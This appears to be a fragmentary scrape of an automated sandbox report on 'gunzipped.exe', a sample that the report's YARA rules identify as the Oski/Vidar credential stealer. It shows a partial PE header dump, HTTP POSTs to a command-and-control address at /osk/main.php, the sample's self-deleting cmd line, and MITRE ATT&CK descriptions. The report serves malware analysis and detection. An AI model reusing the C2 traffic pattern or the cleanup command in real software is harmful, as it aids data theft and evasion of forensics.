9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Jan 6, 2022 07:57:33.324928045 CET	3742	OUT	POST /osk//main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:33.364167929 CET	3743	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:33 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 X-Powered-By: PHP/5.3.29 Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html
Jan 6, 2022 07:57:34.357928991 CET	3743	OUT	POST /osk/ HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 87324 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache
Jan 6, 2022 07:57:34.481220961 CET	3830	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:34 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 X-Powered-By: PHP/5.3.29 Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: gunzipped.exe PID: 7024 Parent PID: 3952

General

Start time:	07:57:21
Start date:	06/01/2022
Path:	C:\Users\user\Desktop\gunzipped.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gunzipped.exe"
Imagebase:	0x400000
File size:	421112 bytes
MD5 hash:	C2301B62539ADCBA29DCF6A3200BD017
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: gunzipped.exe PID: 1068 Parent PID: 7024

General

Start time:	07:57:23
Start date:	06/01/2022
Path:	C:\Users\user\Desktop\gunzipped.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gunzipped.exe"
Imagebase:	0x400000
File size:	421112 bytes
MD5 hash:	C2301B62539ADCBA29DCF6A3200BD017
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 3120 Parent PID: 1068

General

Start time:	07:57:35
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4140 Parent PID: 3120

General

Start time:	07:57:36
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exe PID: 5332 Parent PID: 3120

General

Start time:	07:57:36
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /pid 1068
Imagebase:	0xc50000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report gunzipped.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Oski

Threatname: Vidar

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre